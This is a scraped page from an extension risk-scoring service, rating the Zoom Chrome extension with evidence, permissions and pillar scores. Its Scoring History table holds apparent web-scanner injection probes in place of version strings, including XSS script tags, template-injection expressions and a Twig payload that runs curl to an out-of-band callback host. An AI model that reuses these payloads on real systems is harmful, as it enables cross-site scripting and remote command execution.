Zoom Chrome Extension
kgjfgplpablkjnlkjmjdecgdpfankdle
Risk Score
2.77
Risk Level:
Low
Recommendation:
🟢 LOW RISK — review
Top Risks
- Privacy policy is a generic Zoom corporate policy, not scoped to this extension; admits data collection and third-party sharing.
- install_url_hijack flag set true; onInstalled may open a third-party URL.
- CSP script-src allows broad https://*.google.com and https://*.zoom.us remote origins.
- Operator cluster has 1 sibling extension under same fingerprint; adds marginal blast-radius concern.
- Rating 3.9 across large install base; no review red flags detected but below 4.0 threshold.
Evidence
- privacy_policy_not_extension_scoped api Policy fetched; scope_extension=false, data_collection=true, third_party_sharing=true → privacy pillar 10.0.
- install_url_hijack crx install_url_hijack=true, target=null; onInstalled opens external URL. Webstore +2.0.
- is_featured_by_google store Google Featured badge present; reputation discount -2.0 applied.
- confirmed_owner_brand store brand_mention.confirmed_owner=true, developer_domain=zoom.us resolves; no impersonation.
- csp_remote_script_src crx script-src includes https://*.google.com and https://*.zoom.us; not unsafe-eval/inline.
- operator_cluster_sibling api sibling_count=1 (pnlbnejodfpnapdpoiboebofddaejkbg); Webstore +2.5.
- no_cve_findings crx cve_findings_raw empty; jquery 3.7.1 bundled, no known CVEs.
- recently_updated store months_since_update=1; maintenance pillar 0.0.
Permissions Breakdown
- storage low Persists meeting preferences locally; minimal risk.
- unlimitedStorage low Allows larger local storage quota; no remote exfil risk alone.
- host:https://www.google.com/calendar/* medium Content script on Google Calendar to inject Zoom scheduling UI; matches stated function.
- host:https://calendar.google.com/calendar/* medium Content script on Google Calendar; same justified-broad discount applies.
- host:https://*.zoom.us/* low First-party Zoom domain access; necessary for auth and meeting launch.
- host:https://*.zoom.com/* low First-party Zoom domain access; consistent with stated function.
Pillar Scores
Permissions0.60
Reputation2.50
Network1.50
Webstore3.50
Maintenance0.00
Privacy10.00
Code Quality0.00
CVE Exposure0.00
Operator Siblings (1)
Other extensions sharing this developer's compound fingerprint:
Scoring History
| sssiedn6a2219c7dp727562726963xsx | 3.22 | Low | review | 2026-08-27 |
| <fsssiedxg | 3.24 | Low | review | 2026-08-10 |
| <fsssiedxg$"sssiedx | 3.27 | Low | review | 2026-08-10 |
| xx pfsssiedxf$"sssiedx | 3.20 | Low | review | 2026-08-10 |
| 'fsssiedxf'sssiedx | 2.98 | Low | review | 2026-08-10 |
| 'fsssiedxf$'sssiedx | 3.29 | Low | review | 2026-08-10 |
| 1.73 | Low | review | 2026-08-10 | |
| <fsssiedxffdsaxax><!--></ScRiPt>asddsssiedx | 3.06 | Low | review | 2026-08-10 |
| fsssiedxf<sssiedx | 1.66 | Low | review | 2026-08-10 |
| <fsssiedx{'sssiedx | 3.36 | Low | review | 2026-08-10 |
| fsssiedx<sssiedx | 3.28 | Low | review | 2026-08-10 |
| %27fsssiedxa xx psssiedx | 3.36 | Low | review | 2026-08-09 |
| 'fsssiedxa$'sssiedx | 3.04 | Low | review | 2026-08-09 |
| "fsssiedxa$"sssiedx | 1.75 | Low | review | 2026-08-09 |
| fsssiedxa<sssiedx | 3.28 | Low | review | 2026-08-09 |
| v3.6/u0022onmouseover=8Dec(95033)/u0022 | 3.58 | Low | review | 2026-08-05 |
| bfgx6201%C0%BEz1%C0%BCz2a%90bcxhjl6201 | 3.03 | Low | review | 2026-08-05 |
| bfg9075<s1﹥s2ʺs3ʹhjl9075 | 3.38 | Low | review | 2026-08-05 |
| v3.6&n941262=v946498 | 2.87 | Low | review | 2026-08-05 |
| <fsssiedxh xx psssiedx | 3.19 | Low | review | 2026-08-02 |
| <fsssiedxh | 3.21 | Low | review | 2026-08-02 |
| <fsssiedxh$"sssiedx | 1.55 | Low | review | 2026-08-02 |
| fsssiedxwfdsaxax><!--></ScRiPt>asddsssiedx | 3.51 | Low | review | 2026-08-02 |
| fsssiedxw xx psssiedx | 3.22 | Low | review | 2026-08-02 |
| fsssiedxw | 3.44 | Low | review | 2026-08-02 |
| sssieddrubricxsx | 1.82 | Low | review | 2026-08-02 |
| %76%33%2E%36%39%35%36%34%22%28%29%3B%7D%5D%39%38%38%36 | 3.06 | Low | review | 2026-07-29 |
| %76%33%2E%36%22%6F%6E%6D%6F%75%73%65%6F%76%65%72%3D%51%68%77%6C%28%39%39%39%31%34%29%22 | 2.79 | Low | review | 2026-07-29 |
| dfb__${98991*97996}__::.x | 3.12 | Low | review | 2026-07-29 |
| bfgx3949%C0%BEz1%C0%BCz2a%90bcxhjl3949 | 3.15 | Low | review | 2026-07-29 |
| <th:t="${dfb}#foreach | 3.43 | Low | review | 2026-07-29 |
| <%={{={@{#{${dfb}}%> | 1.57 | Low | review | 2026-07-29 |
| v3.6'"()&%<zzz><ScRiPt >Qhwl(9524)</ScRiPt> | 2.93 | Low | allow | 2026-07-29 |
| {{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("curl hituhqimjhslwe42b6.bxss.me")}} | 3.21 | Low | review | 2026-07-29 |
| v3.6 | 2.77 | Low | review | 2026-06-16 |
Bookkeeping
Rubric v3.6
Scored at 2026-06-16 07:48
Listing SHA
b8fe1caf1239…
Force block
— not fired
Score recovered
no
Elapsed
21.0s